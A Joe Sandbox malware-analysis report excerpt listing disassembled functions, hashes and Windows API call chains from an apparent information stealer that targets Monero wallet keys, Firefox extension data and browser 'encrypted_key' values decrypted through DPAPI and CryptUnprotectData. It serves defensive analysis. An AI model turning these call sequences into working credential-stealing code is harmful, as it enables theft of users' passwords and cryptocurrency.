                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: c57e0535520ec6dbcb90d98a6ff293707b9d08751472fa5efda91153ccd7b90c
                              • Instruction ID: 59da40ab87bd05bdb321bbdcca5ee947e6d9211a69b71395d9a857b9d3e7b410
                              • Opcode Fuzzy Hash: c57e0535520ec6dbcb90d98a6ff293707b9d08751472fa5efda91153ccd7b90c
                              • Instruction Fuzzy Hash: 6AE1D6729101289BCB08EBA8EDA2EEE733DFF54310F508555F516B6191DF346A88CB63
                              Function 0081D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 00828CF0: GetSystemTime.KERNEL32(00830E1B,015FA008,008305B6,?,?,008113F9,?,0000001A,00830E1B,00000000,?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 00828D16
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081D581
                              • lstrlen.KERNEL32(00000000), ref: 0081D798
                              • lstrlen.KERNEL32(00000000), ref: 0081D7AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0081D82B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 0e931ebdf9d71b9c1342e69cf9abbe22240594cca9295a92a2afbfa55664977e
                              • Instruction ID: cea3b79c1b78f568f9147dd0a1389ccf5ec4ca993303e930caff4bcc834b5f57
                              • Opcode Fuzzy Hash: 0e931ebdf9d71b9c1342e69cf9abbe22240594cca9295a92a2afbfa55664977e
                              • Instruction Fuzzy Hash: AB91F6729101189BCB08EBA8EDA6EEE7339FF54310F504558F516F6191EF346A88CB63
                              Function 0081D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 00828CF0: GetSystemTime.KERNEL32(00830E1B,015FA008,008305B6,?,?,008113F9,?,0000001A,00830E1B,00000000,?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 00828D16
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081D901
                              • lstrlen.KERNEL32(00000000), ref: 0081DA9F
                              • lstrlen.KERNEL32(00000000), ref: 0081DAB3
                              • DeleteFileA.KERNEL32(00000000), ref: 0081DB32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: f45dc03ce4199b6c660db460710b1afd8e23bd1027bc63f2628a736cc6ff2fa1
                              • Instruction ID: 576520806967d390b85748eb129b5bcde7e715874f5f672e5f1d286125a8e3ac
                              • Opcode Fuzzy Hash: f45dc03ce4199b6c660db460710b1afd8e23bd1027bc63f2628a736cc6ff2fa1
                              • Instruction Fuzzy Hash: 3181D3729101249BCB08EBA8EDA6EEE7339FF54310F404558F516F6191EF346A89CB63
                              Function 0088FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AdjustPointer
                              • String ID:
                              • API String ID: 1740715915-0
                              • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                              • Instruction ID: d74b3289430c78f5a336a245d3d95c2c1e328bc66d08e841ccf2195a91dd8d6e
                              • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                              • Instruction Fuzzy Hash: 2851B272500606AFEF29AF58C841BBA77A4FF41314F28452DEB06D6692EF31ED40DB91
                              Function 0081A560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 0081A664
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocLocallstrcpy
                              • String ID: @$v10$v20
                              • API String ID: 2746078483-278772428
                              • Opcode ID: 64274629c3fb1d32c546074b896cde2b1abf5bf8f941d298db6169fa81fa1751
                              • Instruction ID: 7bf8443ba894841cdb718673e962a6f8cc3bd9f5c36360e9496661afbae6eb5a
                              • Opcode Fuzzy Hash: 64274629c3fb1d32c546074b896cde2b1abf5bf8f941d298db6169fa81fa1751
                              • Instruction Fuzzy Hash: 87513E70A1021C9FDB18DFA8DD96BED777AFF40304F008518F90AAB291DB706A85CB52
                              Function 0081F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 0081A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0081A13C
                                • Part of subcall function 0081A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0081A161
                                • Part of subcall function 0081A110: LocalAlloc.KERNEL32(00000040,?), ref: 0081A181
                                • Part of subcall function 0081A110: ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 0081A1AA
                                • Part of subcall function 0081A110: LocalFree.KERNEL32(0081148F), ref: 0081A1E0
                                • Part of subcall function 0081A110: CloseHandle.KERNEL32(000000FF), ref: 0081A1EA
                                • Part of subcall function 00828FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00828FE2
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00831678,00830D93), ref: 0081F64C
                              • lstrlen.KERNEL32(00000000), ref: 0081F66B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 904b384facef8f671396cef3c9851f0e911fcab4ff19132ab386b0b856734221
                              • Instruction ID: a3f375c1dd20582e34f4aa138e2b2ed113c5d4ad423737b6098f15b66b8df2cc
                              • Opcode Fuzzy Hash: 904b384facef8f671396cef3c9851f0e911fcab4ff19132ab386b0b856734221
                              • Instruction Fuzzy Hash: 8451C071D101189BCB08FBA8EDA6DED7379FF54310F408568F916A7191EE346A48CB63
                              Function 008237B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 63fe2859e16f4a21edcfa67134cc96cbcddefe1e3cfbc13849854c8a77146cff
                              • Instruction ID: 30f01c534b4923c7dfd15b2f430ed0511a455a22b20f7eae85fe75b764c86509
                              • Opcode Fuzzy Hash: 63fe2859e16f4a21edcfa67134cc96cbcddefe1e3cfbc13849854c8a77146cff
                              • Instruction Fuzzy Hash: 59411271D101199BCB08EFA4E865AEEB779FF54304F008418F516BA290EB759A85CF92
                              Function 0081A430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0081A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0081A13C
                                • Part of subcall function 0081A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0081A161
                                • Part of subcall function 0081A110: LocalAlloc.KERNEL32(00000040,?), ref: 0081A181
                                • Part of subcall function 0081A110: ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 0081A1AA
                                • Part of subcall function 0081A110: LocalFree.KERNEL32(0081148F), ref: 0081A1E0
                                • Part of subcall function 0081A110: CloseHandle.KERNEL32(000000FF), ref: 0081A1EA
                                • Part of subcall function 00828FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00828FE2
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0081A489
                                • Part of subcall function 0081A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00814F3E,00000000,00000000), ref: 0081A23F
                                • Part of subcall function 0081A210: LocalAlloc.KERNEL32(00000040,?,?,?,00814F3E,00000000,?), ref: 0081A251
                                • Part of subcall function 0081A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00814F3E,00000000,00000000), ref: 0081A27A
                                • Part of subcall function 0081A210: LocalFree.KERNEL32(?,?,?,?,00814F3E,00000000,?), ref: 0081A28F
                                • Part of subcall function 0081A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0081A2D4
                                • Part of subcall function 0081A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0081A2F3
                                • Part of subcall function 0081A2B0: LocalFree.KERNEL32(?), ref: 0081A323
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: b7ea36b3afa64c1f9b78a656ea740d0473c1e5cb0bd464b17547217ec03e7d1c
                              • Instruction ID: bdd15c08bb8d4bb7f4dbace38b04daa7593301c23be48c043800ccc8a29a120d
                              • Opcode Fuzzy Hash: b7ea36b3afa64c1f9b78a656ea740d0473c1e5cb0bd464b17547217ec03e7d1c
                              • Instruction Fuzzy Hash: 1A3133B5D011099BCF08DBD8DD85AEFB7B9FF58304F444518E901E7241E7359A84CBA2
                              Function 00828810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008305BF), ref: 0082885A
                              • Process32First.KERNEL32(?,00000128), ref: 0082886E
                              • Process32Next.KERNEL32(?,00000128), ref: 00828883
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • CloseHandle.KERNEL32(?), ref: 008288F1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 615b067b257d5ba0ff47379816094f1237b6ca585d81f96316e75a4c5c8702ea
                              • Instruction ID: 8dab2858842eea0de5af3f94843f19aedbf7b0c60e62a5038c249480b3208ec2
                              • Opcode Fuzzy Hash: 615b067b257d5ba0ff47379816094f1237b6ca585d81f96316e75a4c5c8702ea
                              • Instruction Fuzzy Hash: E6312C71901228ABCB28DB94ED51BEEB778FF44710F504599F50AE61A0DB306A84CFA2
                              Function 0088FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0088FE13
                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0088FE2C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
